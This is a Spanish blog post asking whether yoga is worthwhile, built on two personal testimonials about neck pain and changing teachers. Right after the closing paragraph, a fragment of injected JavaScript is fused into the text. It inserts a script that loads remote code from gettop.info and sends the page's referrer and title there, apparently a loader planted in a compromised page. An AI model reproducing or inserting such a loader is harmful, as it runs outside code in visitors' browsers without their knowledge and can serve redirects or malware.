Salud y belleza » Bienestar, Deportes

¿Yoga o no Yoga? Esa es la cuestión

Sin Comentarios

Las posiciones con respecto a la práctica del Yoga -no hablamos de las posiciones físicas del propio ejercicio sino de los caminos intelectuales que cada individuo escoge como opinión sobre el tema- son variadas y controversiales. Mientras ciertos sujetos afirman que el Yoga prácticamente les “cambió” la vida, otros aseguran que no les aportó “ningún tipo de beneficio”. Entonces la pregunta, cuál dardo, se dispara con precisión y hacia el blanco: ¿es realmente  una experiencia enriquecedora o solo un ejercicio de limitada riqueza?.

“El debate en torno al Yoga ha existido desde siempre. Se trata de una práctica con muchas fronteras y discutible. La razón es simple, solo funciona el Yoga en aquellas personas que se entregan sin dudar y que confían en los resultados. El Yoga no es un deporte por lo tanto requiere voluntades diferentes. Aún así existe una realidad palpable: día a día son más las personas que se vuelcan a los ejercicios y las posturas relajantes, desestresantes del Yoga” dice un profesor famoso en España que se jacta de tener más alumnos que nadie.

A estas alturas ya todos sabemos de qué se trata el Yoga , por lo tanto sería un buen ejercicio aportar no datos históricos (de esos que ya hemos repasado en este blog, por cierto) sino preguntas y respuestas, más bien testimonios, de gente que practica o ha practicado el ancestral trabajo para así hallar una determinación no popular (¡imposible hacerlo en tan poco espacio, con tan escasa preparación!) sino tan solo algunas “postales”…

Juanito tiene 40 años y comenzó con el Yoga por recomendación de su médico: “yo sufría serios dolores en el cuello. Mi doctor me dijo que podía ser tensión acumulada, que comenzara a intentar relajarme. Así me decidí por su recomendación que era el Yoga. Al principio no me gustó para nada, solo eran poses raras, nada que pudiese curarme, pensé yo. Pero luego, con el tiempo, fui perdiendo los dolores y tomando el gusto al ejercicio. Hoy puedo decir que el Yoga es una gran opción”.

El caso de Laura, de 50 años, ama de casa, es diferente pero similar: “empecé Yoga porque tenía tiempo libre y los trabajos de mucho desgaste no me seducen. Al princpio el Yoga me aburría y lo dejé. Luego, finalmente, cambié de profesor y las cosas fueron por un rumbo diferente. En mi experiencia personal, quien da la cátedra puede afectar nuesta experiencia pero el Yoga, en sí, es un ejercicio sumamente recomendable”.

Son solo dos opiniones, ¿Qué pueden hacer en el mundo dos minúsculas opiniones? Mucho, muchisímo. Acá la tuya y la mía son, también, solo dos decisiones y, para nosotros, son las más importantes. En fin, Juanito y Laura respaldan, al menos en este caso, la práctica del Yoga. Veremos qué pasa adelante, con otros testimonios.document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.